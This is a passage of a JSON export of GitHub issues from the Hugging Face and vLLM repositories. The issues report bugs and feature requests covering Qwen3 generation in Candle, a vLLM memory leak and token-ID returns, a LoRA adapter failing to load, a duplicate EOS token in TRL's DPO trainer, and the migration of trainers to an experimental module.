"created_at": "2025-11-07T02:51:56Z", "updated_at": "2025-11-08T19:39:06Z", "comments": 1, "user": "alecsolder" }, { "repo": "huggingface/lerobot", "number": 2399, "title": "Are there plans to support LoRa fine-tuning?", "body": "", "url": "https://github.com/huggingface/lerobot/issues/2399", "state": "open", "labels": [ "question", "performance", "training" ], "created_at": "2025-11-07T02:37:45Z", "updated_at": "2025-11-10T10:23:33Z", "user": "Hukongtao" }, { "repo": "huggingface/candle", "number": 3167, "title": "Qwen 3-1.7b looks like something is wrong and doesn't stop properly.", "body": "Candle version: main\nPlatform: Mac Studio Max M1\nMode: Qwen 3-1.7b, (download by huggingface-cli)\nExecute cmd:\n\ngit clone https://github.com/huggingface/candle.git\ncd candle-examples\ncargo run --release --example qwen -- \\\n--prompt \"What is the speed of light?\" \\\n--model 3-1.7b \\\n--tokenizer-file ../../models/qwen3-1.7b/tokenizer.json \\\n--weight-files \"../../models/qwen3-1.7b/model-00001-of-00002.safetensors,../../models/qwen3-1.7b/model-00002-of-00002.safetensors\" \\\n--temperature 0.3 \\\n--top-p 0.5 \\\n--repeat-penalty 1.5 \\\n--repeat-last-n 16\n\nGot:\n\n```\nQwen 3-1.7B \n\n\nRunning `target/release/examples/qwen --prompt 'What is the speed of light?' --model 3-1.7b --tokenizer-file ../../models/qwen3-1.7b/tokenizer.json --weight-files ../../models/qwen3-1.7b/model-00001-of-00002.safetensors,../../models/qwen3-1.7b/model-00002-of-00002.safetensors --temperature 0.3 --top-p 0.5 --repeat-penalty 1.5 --repeat-last-n 16`\navx: false, neon: true, simd128: false, f16c: false\ntemp: 0.30 repeat-penalty: 1.50 repeat-last-n: 16\nretrieved the files in 300.917\u00b5s\nRunning on CPU, to run on GPU(metal), build this example with `--features metal`\nloaded the model in 7.719477208s\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed Of Light\n\nWhat is the speed of light? What are its properties?\n\nThe Speed...\n\n^C\n```", "url": "https://github.com/huggingface/candle/issues/3167", "state": "open", "labels": [], "created_at": "2025-11-07T02:23:05Z", "updated_at": "2025-11-08T07:52:18Z", "comments": 6, "user": "xiuno" }, { "repo": "huggingface/lerobot", "number": 2398, "title": "how to accelerate the iteration in dataset", "body": "hi, i want to get the frames of specific episode index\n\nwhen `episode_index_target` is large, like 100, it takes a lot of time to run.\n\nany solution to improve the iteration speed ?\n\nthanks.\n\n`lerobot.__version__ == '0.1.0'`\n\n```python\ndataset = LeRobotDataset('yananchen/robomimic_lift')\nframes = []\nfor sample in dataset:\n if sample[\"episode_index\"] == episode_index_target:\n frames.append(sample)\n```", "url": "https://github.com/huggingface/lerobot/issues/2398", "state": "closed", "labels": [ "question" ], "created_at": "2025-11-06T21:37:33Z", "updated_at": "2025-11-10T20:52:57Z", "user": "yanan1116" }, { "repo": "vllm-project/vllm", "number": 28246, "title": "[Bug]: Return Token Ids not returning Gen Token Ids for GPT-OSS-120b", "body": "### Your current environment\n\n
\nUsing docker image vllm/vllm-openai:latest\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nWhen passing in return_token_ids flag to v1/chat/completions endpoint for GPTOSS-120b, only prompt_token_ids are returned and not token_ids. We have not seen this happen with any other model except GPTOSS-120b\n\n```\ncurl --location 'http://localhost:8015/v1/chat/completions' \\\n --header 'Content-Type: application/json' \\\n --data '{\n \"model\": \"gpt-oss-120b\",\n \"messages\": [{\"content\": \"Hello!\", \"role\": \"user\"}],\n \"temperature\": 0,\n \"return_token_ids\": true\n }'\n```\n\n`{\"id\":\"chatcmpl-a19161b8131141e2a79495025adb40eb\",\"object\":\"chat.completion\",\"created\":1762462711,\"model\":\"gpt-oss-120b\",\"choices\":[{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":\"Hello! How can I help you today?\",\"refusal\":null,\"annotations\":null,\"audio\":null,\"function_call\":null,\"tool_calls\":[],\"reasoning_content\":\"The user says \\\"Hello!\\\" We should respond politely. No special instructions. Just greet back.\"},\"logprobs\":null,\"finish_reason\":\"stop\",\"stop_reason\":null,\"token_ids\":null}],\"service_tier\":null,\"system_fingerprint\":null,\"usage\":{\"prompt_tokens\":71,\"total_tokens\":109,\"completion_tokens\":38,\"prompt_tokens_details\":null},\"prompt_logprobs\":null,\"prompt_token_ids\":[200006,17360,200008,3575,553,17554,162016,11,261,4410,6439,2359,22203,656,7788,17527,558,87447,100594,25,220,1323,19,12,3218,198,6576,3521,25,220,1323,20,12,994,12,3218,279,30377,289,25,14093,279,2,13888,18403,25,8450,11,1721,13,21030,2804,413,7360,395,1753,3176,13,200007,200006,77944,200008,200007,200006,1428,200008,13225,0,200007,200006,173781],\"kv_transfer_params\":null}`\n\nI've also included in the docker container setup \n\n```\ndocker run --rm -d --name vllm-gpt-oss-120b \\\n --gpus '\"device=4,5\"' \\\n --shm-size=16g \\\n -e TORCH_CUDA_ARCH_LIST=\"9.0\" \\\n -v /mlf1-shared/user/gpt-oss-120b:/opt/model \\\n -p ${PORT}:${PORT} \\\n vllm/vllm-openai:latest\\\n --model /opt/model \\\n --served-model-name \"${SERVED_MODEL_NAME}\" \\\n --tensor-parallel-size \"${TP_SIZE}\" \\\n --gpu-memory-utilization \"${GPU_UTIL}\" \\\n --max-num-seqs 64 \\\n --port ${PORT}\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28246", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-06T21:08:16Z", "updated_at": "2025-11-07T00:18:25Z", "comments": 1, "user": "sophies-cerebras" }, { "repo": "vllm-project/vllm", "number": 28236, "title": "[Feature]: Implement naive prepare/finalize class to replace naive dispatching in fused_moe/layer.py", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe `FusedMoE` layer has a special case dispatch/combine for EP+DP when there is no specific all2all backend specified. This makes the code in `layer.py` a bit confusing and hard to follow. One way to simplify this is to implement a proper `FusedMoEPrepareAndFinalize` subclass for naive dispatch/combine.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28236", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-11-06T18:38:38Z", "updated_at": "2025-11-12T06:36:29Z", "comments": 4, "user": "bnellnm" }, { "repo": "vllm-project/vllm", "number": 28233, "title": "[Usage]: LogitProcessor vLLM 0.9.1 run the same prompt 50 times with batching, apply logitprocessor independently on each", "body": "### Your current environment\n\nGoal\nRun the same prompt 50 times through vLLM 0.9.1, generating independent outputs with a custom LogitsProcessor that forces a comma token after some pattern \"xyz\" appears in each generation.\nWhat You Want\n\nBatched execution: Process all 50 generations efficiently in parallel\nIndependent state: Each of the 50 generations should have its own state in the logits processor\nPattern detection: When text ends with \"xyz\", mask all tokens except comma },\nOne-time application: Each generation should only apply the comma mask once\n\nCurrent Hurdles\n1. Processor Signature Confusion\nvLLM V0 (0.9.1) uses signature: __call__(prompt_token_ids, generated_token_ids, logits)\n\nprompt_token_ids: The input prompt tokens (same for all 50)\ngenerated_token_ids: Tokens generated so far (different per generation)\nProblem: No built-in request ID to distinguish between the 50 generations\n\n2. State Management\nWhen using the same prompt 50 times:\n\nAll generations share identical prompt_token_ids\nCan't use prompt as unique identifier\nUsing generated_token_ids as key works initially, but becomes complex as sequences diverge\nState dictionary grows indefinitely without cleanup\n\n3. Batching vs Sequential\n\nBatching (llm.generate([prompt]*50)): Processor is called for all 50 in interleaved order, making state tracking difficult\nSequential (50 separate calls): Works reliably but loses parallel efficiency\n\nWorking Solution (Sequential)\nfor i in range(50):\n processor = LookAheadProcessor(tokenizer) # Fresh processor each time\n sampling_params = SamplingParams(..., logits_processors=[processor])\n output = llm.generate([prompt], sampling_params)\nThis works because each generation gets its own processor instance.\nThe Core Problem\nvLLM V0's logits processor API doesn't provide per-request identifiers in batched scenarios, making it impossible to maintain independent state for identical prompts without workarounds like using (prompt_tokens, generated_tokens) tuples as keys - which still fails when generations produce identical token sequences early on. Anyone knows a solution to this problem ?\n\n### How would you like to use vllm\n\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28233", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-06T18:11:32Z", "updated_at": "2025-11-06T18:11:32Z", "comments": 0, "user": "jindalankush28" }, { "repo": "vllm-project/vllm", "number": 28230, "title": "[Bug]: GPU VRAM continuously increase during Qwen3-VL usage over days until OOM", "body": "### Your current environment\n\nSetup:\ndocker run -d \\\n --runtime nvidia \\\n --gpus '\"device=3,4,5,6\"' \\\n -e TRANSFORMERS_OFFLINE=1 \\\n -e DEBUG=\"true\" \\\n -p 8000:8000 \\\n --ipc=host \\\n vllm/vllm-openai:v0.11.0 \\\n --gpu-memory-utilization 0.95 \\\n --model Qwen/Qwen3-VL-235B-A22B-Instruct-FP8 \\\n --tensor-parallel-size 4 \\\n --mm-encoder-tp-mode data \\\n --enable-auto-tool-choice \\\n --tool-call-parser hermes \\\n --limit-mm-per-prompt.video 0\nServer: 8*H200 with CUDA=12.6.\n\n### \ud83d\udc1b Describe the bug\n\nThis is the same issue described in \nhttps://github.com/vllm-project/vllm/issues/27466\nhttps://github.com/vllm-project/vllm/issues/27452\nVRAM continuously increase over days after usage with vision. When available VRAM drops below 500MB, OOM occurs during new requests.\nAs described in other posts, removing mm_encoder_tp_mode=\"data\" or --enforce-eager does not work either.\nThere is currently no acceptable solution.\nIs there a memory leakage? It is understood that VRAM usage may go up during vision task, but that should be cleared. VRAM cannot continuously increase and eventually hit OOM.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28230", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-06T17:19:18Z", "updated_at": "2025-12-02T16:50:26Z", "comments": 15, "user": "yz342" }, { "repo": "huggingface/datasets", "number": 7852, "title": "Problems with NifTI", "body": "### Describe the bug\n\nThere are currently 2 problems with the new NifTI feature:\n1. dealing with zipped files, this is mentioned and explained [here](https://github.com/huggingface/datasets/pull/7815#issuecomment-3496199503)\n2. when uploading via the `niftifolder` feature, the resulting parquet only contains relative paths to the nifti files:\n\n```bash\ntable['nifti']\n\n[\n -- is_valid: all not null\n -- child 0 type: binary\n [\n null,\n null,\n null,\n null,\n null,\n null\n ]\n -- child 1 type: string\n [\n \"/home/tobias/programming/github/datasets/nifti_extracted/T1.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/T2-interleaved.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/T2.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/T2_-interleaved.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/T2_.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/fieldmap.nii\"\n ]\n]\n```\ninstead of containing bytes. The code is copy pasted from PDF, so I wonder what is going wrong here.\n\n### Steps to reproduce the bug\n\nsee the linked comment\n\n### Expected behavior\n\ndownloading should work as smoothly as for pdf\n\n### Environment info\n\n- `datasets` version: 4.4.2.dev0\n- Platform: Linux-6.14.0-33-generic-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- `huggingface_hub` version: 0.35.3\n- PyArrow version: 21.0.0\n- Pandas version: 2.3.3\n- `fsspec` version: 2025.9.0\n", "url": "https://github.com/huggingface/datasets/issues/7852", "state": "closed", "labels": [], "created_at": "2025-11-06T11:46:33Z", "updated_at": "2025-11-06T16:20:38Z", "comments": 2, "user": "CloseChoice" }, { "repo": "huggingface/peft", "number": 2901, "title": "AttributeError: 'float' object has no attribute 'meta'", "body": "### System Info\n\npeft== 0.17.1\ntorch== 2.5.1+cu118\ntransformers==4.57.0\npython==3.12.7\n\n### Who can help?\n\nI am trying to use LoRA with DINOv3 (so a slightly modified vit-b). However, I am hitting after a random number of iterations this error. It is sadly difficult to reproduce. Maybe someone can hint at what is going on?\n\n```\nTraceback (most recent call last):\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_dynamo/output_graph.py\", line 1446, in _call_user_compiler\n compiled_fn = compiler_fn(gm, self.example_inputs())\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_dynamo/repro/after_dynamo.py\", line 129, in __call__\n compiled_gm = compiler_fn(gm, example_inputs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/__init__.py\", line 2234, in __call__\n return compile_fx(model_, inputs_, config_patches=self.config)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 1521, in compile_fx\n return aot_autograd(\n ^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_dynamo/backends/common.py\", line 72, in __call__\n cg = aot_module_simplified(gm, example_inputs, **self.kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/aot_autograd.py\", line 1071, in aot_module_simplified\n compiled_fn = dispatch_and_compile()\n ^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/aot_autograd.py\", line 1056, in dispatch_and_compile\n compiled_fn, _ = create_aot_dispatcher_function(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/aot_autograd.py\", line 522, in create_aot_dispatcher_function\n return _create_aot_dispatcher_function(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/aot_autograd.py\", line 759, in _create_aot_dispatcher_function\n compiled_fn, fw_metadata = compiler_fn(\n ^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/_aot_autograd/jit_compile_runtime_wrappers.py\", line 179, in aot_dispatch_base\n compiled_fw = compiler(fw_module, updated_flat_args)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 1350, in fw_compiler_base\n return _fw_compiler_base(model, example_inputs, is_inference)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 1421, in _fw_compiler_base\n return inner_compile(\n ^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 475, in compile_fx_inner\n return wrap_compiler_debug(_compile_fx_inner, compiler_name=\"inductor\")(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_dynamo/repro/after_aot.py\", line 85, in debug_wrapper\n inner_compiled_fn = compiler_fn(gm, example_inputs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 661, in _compile_fx_inner\n compiled_graph = FxGraphCache.load(\n ^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/codecache.py\", line 1334, in load\n compiled_graph = compile_fx_fn(\n ^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 570, in codegen_and_compile\n compiled_graph = fx_codegen_and_compile(gm, example_inputs, **fx_kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/t", "url": "https://github.com/huggingface/peft/issues/2901", "state": "closed", "labels": [], "created_at": "2025-11-06T11:24:18Z", "updated_at": "2025-11-17T15:34:08Z", "comments": 6, "user": "Karol-G" }, { "repo": "vllm-project/vllm", "number": 28192, "title": "[RFC]: Support separate NICs for KV cache traffic and MoE traffic", "body": "### Motivation.\n\nIn MoE models with large KV caches, KV cache all-to-all and MoE expert communication share the same RNIC, causing congestion and degrading performance. Using dedicated NICs for each traffic type can improve bandwidth utilization and reduce interference.\n\n### Proposed Change.\n\nDoes vLLM currently support routing KV cache traffic and MoE traffic through different NICs?\n\n### Feedback Period.\n\n_No response_\n\n### CC List.\n\n_No response_\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28192", "state": "open", "labels": [ "RFC" ], "created_at": "2025-11-06T07:31:17Z", "updated_at": "2025-11-06T08:19:56Z", "comments": 1, "user": "JayFzh" }, { "repo": "vllm-project/vllm", "number": 28186, "title": "[Bug] Cannot load qwen3-vl series with lora adapter", "body": "I fine-tuned the `Qwen3-VL-8B-Instruct` model using Unsloth.\nI moved the saved QLoRA adapter and the `Qwen3-VL-2B-Instruct` model to my vLLM server.\nThen I ran a command to start model serving with vLLM as shown below. (For reference, the vLLM server has no issues\u2014it was already serving official Qwen3-VL models.)\n\n```\ncommand = [\n sys.executable, \n \"-m\", \"vllm.entrypoints.openai.api_server\",\n \"--model\", \"./Qwen3-VL-2B-Instruct\",\n \"--max_model_len\", \"3500\",\n \"--gpu_memory_utilization\", \"0.85\",\n \"--trust-remote-code\",\n \"--host\", \"0.0.0.0\",\n \"--port\", \"8888\",\n\n # for lora adapter\n \"--enable-lora\",\n \"--max-lora-rank\", \"16\", # LoRA rank\n \"--max-loras\", \"1\", \n \"--max-cpu-loras\", \"1\",\n \"--lora-modules\", \"adapter0=./my_lora_adapter\"\n]\n```\n\nI waited for vLLM to properly load the QLoRA adapter, but the following problem occurred : \nhttps://github.com/vllm-project/vllm/issues/26991\n\nWhen I was feeling hopeless, I tried merging the model instead of saving the LoRA adapter separately by using the `save_pretrained_merged()` function as shown below, and then vLLM was able to load and perform inference normally:\n\n```\n save_pretrained_merged( f\"my_16bit_model\", tokenizer, save_method=\"merged_16bit\")\n```\n\nHowever, I don't want to merge the models\u2014I want to load VL model with **LoRA** adapter.\nI\u2019ve seen many posts from others experiencing the same error.\n\nAs of now, what can I do to resolve this issue?", "url": "https://github.com/vllm-project/vllm/issues/28186", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-06T06:02:33Z", "updated_at": "2025-11-09T11:16:27Z", "comments": 4, "user": "deepNoah" }, { "repo": "huggingface/trl", "number": 4481, "title": "DPOTrainer._prepare_dataset() adds an extra eos_token to conversationally formatted inputs", "body": "## Overview\nThe DPOTrainer unconditionally appends the eos_token to both the \"chosen\" and \"rejected\" sequences. Because conversationally formatted inputs will already have the chat template applied, this causes them to have duplicate eos_tokens (Ex. `...<|im_end|><|im_end|>`). \n\nA related problem was reported for the [SFTTrainer](https://github.com/huggingface/trl/issues/3318), where Qwen2.5\u2019s chat template confused the trainer\u2019s logic for detecting whether a sequence already ended with an eos_token_id. The DPO case is slightly different: [DPOTrainer.tokenize_row](https://github.com/huggingface/trl/blob/main/trl/trainer/dpo_trainer.py#L738-L739) explicitly appends tokenizer.eos_token_id to both chosen_input_ids and rejected_input_ids, regardless of whether the text is standard or conversational. Even if the chat template already added the token, it will be added again.\n\n\n## Repro\n```python\nimport trl\nfrom trl import DPOTrainer, DPOConfig\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\nfrom datasets import Dataset\nimport torch\n\nMODEL_ID = \"Qwen/Qwen2.5-0.5B-Instruct\"\n\n# Conversational format\nsample_data = {\n \"prompt\": [[{\"role\": \"user\", \"content\": \"What is 2+2?\"}]],\n \"chosen\": [[{\"role\": \"assistant\", \"content\": \"2+2 equals 4.\"}]],\n \"rejected\": [[{\"role\": \"assistant\", \"content\": \"I don't know math.\"}]]\n}\n\n# Convert to dataset\ntrain_dataset = Dataset.from_dict(sample_data)\n\n# Load model and tokenizer\ntokenizer = AutoTokenizer.from_pretrained(MODEL_ID)\nmodel = AutoModelForCausalLM.from_pretrained(\n MODEL_ID,\n dtype=torch.bfloat16,\n device_map=\"auto\"\n)\n\n# Setup DPO config\ndpo_config = DPOConfig(\n output_dir=\"./dpo_output\",\n per_device_train_batch_size=2,\n num_train_epochs=1,\n logging_steps=1,\n remove_unused_columns=False,\n)\n\n# Initialize DPOTrainer\ntrainer = DPOTrainer(\n model=model,\n args=dpo_config,\n train_dataset=train_dataset,\n processing_class=tokenizer,\n)\n\n# Get the processed batch\ntrain_dataloader = trainer.get_train_dataloader()\nbatch = next(iter(train_dataloader))\n\n# Decode and display the preprocessed sequences\nfor idx in range(len(batch[\"chosen_input_ids\"])):\n \n # Show prompt if available\n if \"prompt_input_ids\" in batch:\n prompt_tokens = batch[\"prompt_input_ids\"][idx]\n print(\"-\"*80)\n print(f\"PROMPT:\")\n print(\"-\"*80)\n print(tokenizer.decode(prompt_tokens, skip_special_tokens=False))\n print(\"-\"*80)\n \n # Show full chosen sequence\n chosen_tokens = batch[\"chosen_input_ids\"][idx]\n print(f\"CHOSEN SEQUENCE:\")\n print(\"-\"*80)\n print(tokenizer.decode(chosen_tokens, skip_special_tokens=False))\n print(\"-\"*80 + \"\\n\")\n \n # Show full rejected sequence\n rejected_tokens = batch[\"rejected_input_ids\"][idx]\n print(f\"REJECTED SEQUENCE:\")\n print(\"-\"*80)\n print(tokenizer.decode(rejected_tokens, skip_special_tokens=False))\n print(\"-\"*80)\n```\n\n## Outputs:\nNotice the double `<|im_end|>` tokens for the 'chosen' and 'rejected' columns.\n```\n--------------------------------------------------------------------------------\nPROMPT:\n--------------------------------------------------------------------------------\n<|im_start|>system\nYou are Qwen, created by Alibaba Cloud. You are a helpful assistant.<|im_end|>\n<|im_start|>user\nWhat is 2+2?<|im_end|>\n<|im_start|>assistant\n\n--------------------------------------------------------------------------------\nCHOSEN SEQUENCE:\n--------------------------------------------------------------------------------\n2+2 equals 4.<|im_end|>\n<|im_end|>\n--------------------------------------------------------------------------------\n\nREJECTED SEQUENCE:\n--------------------------------------------------------------------------------\nI don't know math.<|im_end|>\n<|im_end|>\n--------------------------------------------------------------------------------\n```\n\n\n### System Info\n\n- Platform: Linux-6.11.0-1016-nvidia-x86_64-with-glibc2.39\n- Python version: 3.12.11\n- TRL version: 0.24.0\n- PyTorch version: 2.7.1+cu128\n- accelerator(s): NVIDIA H200\n- Transformers version: 4.57.1\n- Accelerate version: 1.11.0\n- Accelerate config: not found\n- Datasets version: 4.4.1\n- HF Hub version: 0.36.0\n- bitsandbytes version: not installed\n- DeepSpeed version: not installed\n- Liger-Kernel version: not installed\n- LLM-Blender version: not installed\n- OpenAI version: not installed\n- PEFT version: not installed\n- vLLM version: not installed\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/wo", "url": "https://github.com/huggingface/trl/issues/4481", "state": "open", "labels": [ "\ud83d\udc1b bug", "\ud83c\udfcb DPO" ], "created_at": "2025-11-06T01:17:05Z", "updated_at": "2025-11-06T18:40:39Z", "comments": 0, "user": "DevonPeroutky" }, { "repo": "huggingface/trl", "number": 4468, "title": "Move RLOOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove RLOOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay stay in trl.experimental as maintenance cost is low.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4468", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement" ], "created_at": "2025-11-05T21:30:15Z", "updated_at": "2025-12-05T18:21:41Z", "comments": 2, "user": "behroozazarkhalili" }, { "repo": "huggingface/trl", "number": 4466, "title": "Move PPOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove PPOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay stay in trl.experimental as it's an important baseline but requires heavy refactoring.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4466", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb PPO" ], "created_at": "2025-11-05T21:29:54Z", "updated_at": "2025-11-13T19:01:20Z", "comments": 0, "user": "behroozazarkhalili" }, { "repo": "huggingface/trl", "number": 4465, "title": "Move ORPOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove ORPOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay stay in trl.experimental.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4465", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb ORPO" ], "created_at": "2025-11-05T21:29:44Z", "updated_at": "2025-11-21T06:36:32Z", "comments": 0, "user": "behroozazarkhalili" }, { "repo": "huggingface/trl", "number": 4463, "title": "Move KTOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove KTOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay be promoted to main codebase after refactoring.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4463", "state": "open", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb KTO" ], "created_at": "2025-11-05T21:29:25Z", "updated_at": "2025-11-05T21:29:50Z", "comments": 0, "user": "behroozazarkhalili" }, { "repo": "huggingface/trl", "number": 4461, "title": "Move OnlineDPOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove OnlineDPOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay be removed based on usage and maintenance requirements.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: 